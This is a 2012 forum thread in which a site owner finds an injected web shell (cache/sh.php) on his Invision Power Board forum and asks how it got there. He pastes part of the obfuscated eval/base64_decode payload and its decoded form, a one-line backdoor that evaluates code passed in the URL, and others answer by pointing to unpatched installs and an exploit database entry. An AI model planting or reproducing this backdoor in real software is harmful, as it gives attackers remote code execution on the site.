Oberst Posted December 16, 2012 Share Posted December 16, 2012 So, all of a sudden, google started doing its little "This site isnt safe" page for one of my domains. Curious, I ran clamav, and then ran ipb's internal scanner. IPB came up with this file tilted sh.php. I went to FTP to see what the contents of this file was. Its location was cache/sh.php, so I didnt think it was a legit file. Plus IPB listed it at 8. I would post the contents of said file, but I dont know if that would be the best method... You can find it on google if you really wanted to, but it starts out as : ============================================================================== ========================= END =================================== ========================= /index.php?<?/*gHrE={M*/eval/*t%)t*/(/*_f0srO*/base64_decode/*x31sm*/(/*Y%>*/'Lyo/WFdNR2Z5byovZXZhbC8qTEBXfjUqLygvKidoSCovYmFzZTY0X2RlY29kZS8qNXJcYzAqLygvKjo+ZEMqLydMeW83VmtwQlN6NHFMMmxtTHlwN2IxNHFMeWd2S24nLyp0XVJKOiovLi8qYVw+Ml1rKi8nUTlPSHRtTlM0cUwybHpjMlYwTHlwQWV6WlJMU292Jy8qPn5NLSovLi8qLmBrVGdVTCovJ0tDOHFPVEJlTkU4cUx5UmZVa1ZSVlVWVFZDOHFXRycvKik6WiovLi8qOURGREl5cyovJ29sZmpZcUwxc3ZLa1JsYkNvdkoyRW5MeW9vTVNseCcvKkZiTkBXSSovLi8qYkR2SzYqLydWQ292TGk4cWZGVXdYQ292SjNOakp5OHFKazAzTWknLypmKTR7cSovLi8qfU9KV1hmKi8nb3ZYUzhxZWpaeUlGd3FMeThxVW1rM1dYQXFMeWt2Jy8qIHtTKzs8PiovLi8qbWU/UyovJ0tuSmRQelZOS2k4d1JsYkNvdkoyRW5MeW9vTVNseCcvKkZiTkBXSSovLi8qYkR2SzYqLydWQ29... Any ideas how it was inserted, if there is a known patch for it, or is there really no need for concern here? EDIT: Just decoded it on a local machine. comes out to be if ( isset($_REQUEST['asc'])) eval (stripslashes( $_REQUEST ['asc'])); Which, again, can be used to run code just from the url. (index.php?asc=bad code) Isn't there a way to see which queries have been run from which IP? And I still want to see an answer to how did it get put there in the first place? Link to comment Share on other sites More sharing options...
tAPir Posted December 16, 2012 Share Posted December 16, 2012 Is your installation patched? You'll find lots of posts from those who didn't. Just search for the word hacked. Link to comment Share on other sites More sharing options...
Oberst Posted December 16, 2012 Author Share Posted December 16, 2012 Yup... Thanks for that. Upon further research, I searched a exploit DB and saw exactly what happened. http://www.exploit-db.com/exploits/22398/ I just decided to update to 3.4.1. Call it a day. =P Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.